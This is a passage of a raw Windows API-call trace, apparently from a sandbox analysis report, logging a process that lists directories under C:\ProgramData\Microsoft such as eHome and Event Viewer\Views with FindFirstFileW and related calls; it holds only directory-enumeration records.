lpBuffer="C:\\ProgramData\\Microsoft\\eHome\\", lpFilePart=0x0) returned 0x1f [0192.873] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.873] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.873] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0192.874] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0192.874] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0192.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0192.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0192.874] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome", lpFilePart=0x0) returned 0x1e [0192.874] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome\\", lpFilePart=0x0) returned 0x1f [0192.874] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.874] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.875] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0192.875] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0192.875] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0192.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0192.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0192.875] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome\\logs", lpFilePart=0x0) returned 0x23 [0192.875] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome\\logs\\", lpFilePart=0x0) returned 0x24 [0192.875] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.876] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.876] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.876] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0192.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0192.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0192.877] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome\\logs", lpFilePart=0x0) returned 0x23 [0192.877] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\eHome\\logs\\", lpFilePart=0x0) returned 0x24 [0192.877] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fbd0 [0192.877] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.877] FindNextFileW (in: hFindFile=0xb7fbd0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9182055d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0192.877] FindClose (in: hFindFile=0xb7fbd0 | out: hFindFile=0xb7fbd0) returned 1 [0192.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0192.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0192.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0192.878] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer", lpFilePart=0x0) returned 0x25 [0192.878] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\", lpFilePart=0x0) returned 0x26 [0192.878] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.100] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.100] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 1 [0193.100] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 0 [0193.100] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0193.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0193.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0193.100] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer", lpFilePart=0x0) returned 0x25 [0193.100] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\", lpFilePart=0x0) returned 0x26 [0193.100] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.101] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3a6c7630, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x3a6c7630, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.101] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Views", cAlternateFileName="")) returned 1 [0193.101] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0193.101] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0193.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0193.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0193.101] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views", lpFilePart=0x0) returned 0x2b [0193.101] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\", lpFilePart=0x0) returned 0x2c [0193.101] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.102] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.102] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0193.102] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 0 [0193.102] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0193.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0193.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0193.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views", lpFilePart=0x0) returned 0x2b [0193.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\", lpFilePart=0x0) returned 0x2c [0193.103] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.103] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.103] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0193.103] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0193.103] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0193.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0193.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0193.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", lpFilePart=0x0) returned 0x44 [0193.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\", lpFilePart=0x0) returned 0x45 [0193.103] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.104] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.104] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0193.104] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0193.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0193.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0193.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", lpFilePart=0x0) returned 0x44 [0193.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\", lpFilePart=0x0) returned 0x45 [0193.104] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event 